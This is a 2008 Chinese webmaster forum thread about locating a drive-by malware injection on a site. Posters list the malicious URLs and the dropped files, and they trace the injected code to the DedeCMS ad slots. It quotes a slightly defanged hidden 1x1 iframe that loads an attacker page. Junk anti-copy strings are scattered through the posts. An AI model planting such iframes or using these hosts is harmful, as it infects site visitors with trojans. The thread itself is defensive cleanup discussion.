webmasterz.cn上的掛馬掛在哪了 我怎麼查了半天查不到？

請老大仔細的查查吧，剛又發現了幾個，全是免殺的~~一個勁的往外蹦，但是我的卡卡即不報~~
' G; w2 K: ?: k* R8 n8 l0 K9 Ahttp://ppp.749571.com/dm/test.htm
http://www.985676.cn/encrypt/mm.htm
這兩個是免殺的，還有幾個沒記下來，
這掛馬的兔崽子有一手，隱藏的很好啊~~一般人都看不出來~

會在C盤下產生 CRESS1.EXE
然後增加IE的BHO的木馬 還釋放驅動

昏 他藏得好隱秘  找到了 放毒得地方了
( K; y  D5 ~+ n! P; l' s( x. H
; ^* Q" s# p' F" c/ C) E6 \iframe src=h t t p://w w w.9856 76.cn/encrypt/mm.htm width=1 height=1></iframe>
然後再這個地址轉到ppp.749571.co m/dm/test.htm
為了跟蹤這個病毒 自己失誤的。。。。哎。修復中ing。。。。
% U% D& s" H" K1 \靜水趕快清理了吧

原帖由 20082008 於 2008-1-9 16:33 發表
9 r, H" f5 Y  l& c/ M/ J" a沒裝REAL就沒事，好在我重新裝的系統:

' ?) d) b2 T+ T7 G1 c說的沒錯

原帖由 freelzyr 於 2008-1-10 16:47 發表
5 j* @" z) ^4 J# k, V進dede後台
) {/ b2 s" @& K2 |$ f' Z9 U- l檢查 ad_js.php?aid=1  
4 t3 r3 ^7 v5 t) tad_js.php?aid=2
$ u  t' n* l1 kad_js.php?aid=3
ad_js.php?aid=4

這幾個廣告 裡面的代碼
: t$ R  r' T1 \3 j- D& l在這幾個 掉茅廁位 裡面   含有 木馬的 代碼

4 C+ w% m1 I2 e: I* h
4 C: v4 }! k* l3 w0 o- w/ h這個檢查了沒有的

原帖由 靜水流深 於 2008-1-11 02:27 發表


這個檢查了沒有的

% @+ _$ b8 _3 u, ]6 n; `1 i" X
3 \; X- j) r7 q% k+ a! o
我看過了，有掛馬的代碼，代碼已經在你的另一個貼子裡貼出來了

原帖由 靜水流深 於 2008-1-11 02:27 發表

/ N5 b: A1 L: O
7 r& o0 d( h' d* c9 W* s9 u這個檢查了沒有的

2 W% V0 S3 y, Z! b: u' A* r; i木馬就是在這裡裡啊
在後台的掉茅廁位設置那
裡

現在明瞭.
有人收流量做ppp.749571.co m的..
最近被掛馬的話. 都改成js了. 不用iframe了

菜鳥,怕怕,不敢看,啥時好了說一聲,我再去看風景